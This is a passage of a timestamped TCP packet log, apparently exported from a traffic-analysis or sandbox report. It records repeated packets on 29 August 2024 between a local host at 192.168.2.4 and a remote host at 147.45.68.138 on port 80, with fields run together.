                                                      Aug 29, 2024 22:52:22.184788942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184793949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184801102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184813976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184820890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184842110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184844971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184856892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184869051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184870958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184886932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184889078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184901953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184911013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184911966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184922934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184933901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.184942961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184971094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.184984922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217025042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217051029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217061996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217072010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217072010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217084885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217086077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217103958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217109919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217117071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217154980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217164993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217199087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217211008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217221022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217231989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217237949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217245102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217256069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217257977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217267990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.217282057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217300892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.217322111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.249141932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249197006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249208927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249229908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.249254942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.249267101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249278069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249286890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249298096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249308109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.249311924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.249331951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.249356985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.254566908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.254625082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.254637003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.254650116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.254673958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.254687071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.254762888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.254774094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.254784107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.254797935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.254803896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.254832029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255028009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255040884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255049944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255070925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255095959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255096912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255109072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255120039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255132914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255139112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255158901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255182028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255189896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255208969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255224943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255232096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255238056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255249023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255250931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255260944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255270004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255275965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255300045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255319118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255801916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255814075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255825043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255841970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255855083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255906105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255917072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255927086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255938053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255944014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255949974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255969048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255985975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.255995035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.255997896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.256019115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.256023884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.256036997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.256046057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.256047964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.256056070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.256059885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.256078005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.256098032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258632898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258645058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258661985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258677959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258690119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258697033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258699894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258713007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258722067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258723021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258735895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258742094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258759975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258769035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258781910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258790970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258790970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258812904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258814096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258826017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258837938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258840084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258851051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258860111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258862019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258873940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258888006 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258893967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258907080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258908987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258917093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258929014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258935928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258940935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.258960962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.258987904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.269153118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269182920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269187927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269201994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269217014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269227982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269242048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269258022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269259930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.269268990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269272089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.269280910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269292116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269298077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.269303083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269314051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269316912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.269325018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269335985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.269336939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269350052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.269371033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.269395113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271436930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271449089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271459103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271476984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271480083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271502018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271507978 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271514893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271533966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271542072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271552086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271558046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271562099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271574020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271584034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271584034 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271595001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271605015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271610022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271620035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271635056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271645069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271656036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271656990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271673918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271686077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271686077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271696091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271708012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271716118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271717072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271733046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271739960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271749020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.271759987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.271780014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.303944111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.303980112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.303988934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304030895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304039955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.304048061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304053068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304056883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304068089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304068089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.304079056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304089069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304104090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304105043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.304116011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304126024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304136038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304136992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.304155111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.304177046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.304182053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.304214001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.337901115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.337975025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.337997913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.338009119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.338023901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.338035107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.338041067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.338047028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.338061094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.338064909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.338073969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.338097095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.338119030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.346440077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.346482038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.346491098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.346528053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.346554041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.346571922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.346582890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.346592903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.346602917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.346622944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.346657038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.346657038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347474098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347508907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347518921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347526073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347548962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347549915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347554922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347563028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347592115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347620964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347631931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347640991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347651958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347651958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347661018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347676992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347687006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347690105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347697973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347708941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347711086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347721100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347732067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.347733021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347762108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.347780943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349345922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349395990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349412918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349423885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349433899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349445105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349455118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349472046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349490881 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349493980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349507093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349519014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349534035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349541903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349545002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349550962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349558115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349585056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349608898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349620104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349631071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349639893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.349668980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349668980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.349683046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350543976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350585938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350600958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350611925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350621939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350644112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350668907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350668907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350692034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350703001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350718021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350725889 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350730896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350734949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350753069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350763083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350763083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350764990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350778103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350788116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.350790024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350816965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.350836039 CEST4973980192.168.2.4147.45.68.138
